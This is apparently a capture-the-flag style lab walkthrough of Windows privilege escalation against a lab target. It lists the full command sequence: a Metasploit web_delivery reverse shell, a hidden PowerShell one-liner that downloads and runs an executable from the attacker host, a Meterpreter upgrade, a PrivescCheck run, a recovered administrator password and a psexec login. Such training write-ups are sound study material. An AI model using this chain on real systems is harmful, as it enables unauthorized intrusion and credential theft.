🔬Windows Privilege Escalation
Target IP:
10.2.29.53
Usage of the PrivescCheck.ps1 script
already present on the Victim Machine
Enumeration & Exploitation
nmap -sV 10.2.29.53
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
service postgresql start && msfconsole -q
setg RHOSTS 10.2.29.53
setg RHOST 10.2.29.53
search web_delivery
use exploit/multi/script/web_delivery
info
# Description:
# This module quickly fires up a web server that serves a payload. The
# provided command which will allow for a payload to download and
# execute.
set target PSH\ (Binary)
set payload windows/shell/reverse_tcp
set PSH-EncodedCommand false
set LHOST eth1
exploit
Copy the PowerShell code and run it on the target machine using
cmd
powershell.exe -nop -w hidden -c [Net.ServicePointManager]::SecurityProtocol=[Net.SecurityProtocolType]::Tls12;$z="echo ($env:temp+'\P4MPrq7y.exe')"; (new-object System.Net.WebClient).DownloadFile('http://10.10.24.2:8080/y3MMtnMlRkQ81pA', $z); invoke-item $z
Back to the Attacker machine, Command shell session opened

sessions 1
whoami
# Unprivileged user "student"

# Upgrade to a Meterpreter session
background
search shell_to
use post/multi/manage/shell_to_meterpreter
set LHOST eth1
set SESSION 1
show advanced
set WIN_TRANSFER VBS
options
# check the LPORT is not in conflict with the Session 1
run
sessions 2

ps
migrate 5048
get privs
SeChangeNotifyPrivilege
SeIncreaseWorkingSetPrivilege

Privilege Escalation
cd C:\\Users\\student\\Desktop\\PrivescCheck
shell
dir
Run
PrivescCheck
# Basic mode
powershell -ep bypass -c ". .\PrivescCheck.ps1; Invoke-PrivescCheck"
# Extended Mode + Export Txt Report
powershell -ep bypass -c ". .\PrivescCheck.ps1; Invoke-PrivescCheck -Extended -Report PrivescCheck_%COMPUTERNAME%"
exit
meterpreter > download PrivescCheck_ATTACKDEFENSE.txt
root@attackdefense:~# featherpad PrivescCheck_ATTACKDEFENSE.txt


📌
administrator
:hello_123321
Administrator Login
Use the
administrator
user to run a privilegedcmd
, tryingSMB
legitimate authentication
psexec.py [email protected] cmd.exe
cd C:\Users\Administrator\Desktop
dir
type flag.txt
This can be done with the
exploit/windows/smb/psexec
Metasploit module too.
Last updated
Was this helpful?